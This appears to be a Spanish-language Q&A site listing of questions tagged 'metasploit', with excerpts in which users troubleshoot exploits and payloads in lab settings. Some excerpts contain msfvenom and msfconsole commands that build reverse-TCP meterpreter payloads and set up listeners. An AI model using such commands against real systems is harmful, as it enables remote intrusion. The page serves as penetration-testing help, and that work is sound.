Preguntas con etiqueta 'metasploit'

1
respuesta

nessus escanea contra explotaciones de metasploit

Estoy pensando en lanzar escaneos amplios de nessus (en el sentido de "rango de IP") contra los ataques presentes en metasploit. La idea es limitar el número de complementos para que el análisis finalice en un tiempo razonable. (Como nota al mar...
hecha 10.04.2012 - 12:59
2
respuestas

SambaCry CVE-2017-7494 devuelve "Exploit completado, pero no se creó ninguna sesión"

Estoy utilizando este exploit en msfconsole para explotar una máquina virtual con samba y la configuración es la siguiente: Module options (exploit/linux/samba/sambacry) Payload options (linux/x64/meterpreter/reverse_tcp) 2 Linux x86_64 ->...
hecha 28.08.2018 - 05:32
1
respuesta

La sintaxis antigua para mostrar las opciones de carga útil en msfvenom no funciona

He intentado tantas veces con diferente sintaxis para mostrar las opciones de carga en msfvenom. Sin embargo, no puedo hacer que se ejecute. Versión 1. [*] exec: msfvenom -p windows/shell/bind_tcp --payload-options Error: Missing required...
hecha 03.07.2018 - 08:29
2
respuestas

Los comandos de Meterpreter no funcionan en el shell [cerrado]

Usé use multi/handler seguido de set PAYLOAD windows/meterpreter/reverse_tcp luego set LPORT 80 y set LHOST 192.168.0.11 después de eso, hago exploit -j -z y enciendo mi máquina Windows conectada a la misma...
hecha 01.05.2018 - 01:06
2
respuestas

Carga útil de MSFvenom con opciones dinámicas

Estoy utilizando MSFvenom para exportar la carga útil de TCP inversa del meterpreter. Si bien esto funciona con msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.6.131 LPORT=4444 -f -exe > ~/Desktop/shell_meterpreter.exe , s...
hecha 17.11.2017 - 06:55
1
respuesta

Registro de Metasploit o información adicional Re: Exploit completado, pero no se creó ninguna sesión

Casi todo mi trabajo de laboratorio personal con Metasploit no ha tenido éxito. La mayoría de las veces recibo el mensaje "Exploit completado, pero no se creó ninguna sesión". No sé qué hacer después de que esto suceda. ¿Hay alguna manera de lee...
hecha 08.10.2017 - 05:51
1
respuesta

Metasploit generar comando no funciona

Usando windows / smb / ms08_067_netapi exploit y windows / meterpreter / reverse_tcp como carga útil, esto es lo que obtengo: msf payload(reverse_tcp) > generate -f ~/Desktop/rootkit.exe -p windows -t exe [*] Writing 73802 bytes to ~/Deskto...
hecha 25.06.2017 - 21:41
1
respuesta

Explotación Metasploit que no requiere la interacción inicial del usuario

¿Es posible componer un vector de ataque de tal manera que una víctima remota no tenga que interactuar inicialmente con un atacante? Es decir, si el sistema operativo es vulnerable, ejecutará la vulnerabilidad con éxito sin la percepción de la v...
hecha 24.10.2017 - 12:29
1
respuesta

PSExec no funciona contra Windows XP (metasploit)

Estoy siguiendo el libro Pruebas de penetración: Introducción práctica a la piratería de Georgia Weidman. En el Capítulo 13, página 296, el psexec de metasploit se usa contra un Windows XP Profession SP3 (32 bits) , pero recibí el siguiente e...
hecha 08.04.2017 - 20:05
1
respuesta

Amazon AWS Kali - Metasploit

Estoy usando el mercado de Amazon Kali y estoy intentando probar CVE-2017-0199 para ver si la configuración de mi proxy para bloquear el contenido de la aplicación / hta está funcionando. Hay un módulo en metasploit que me permite probar esto...
hecha 19.05.2017 - 09:58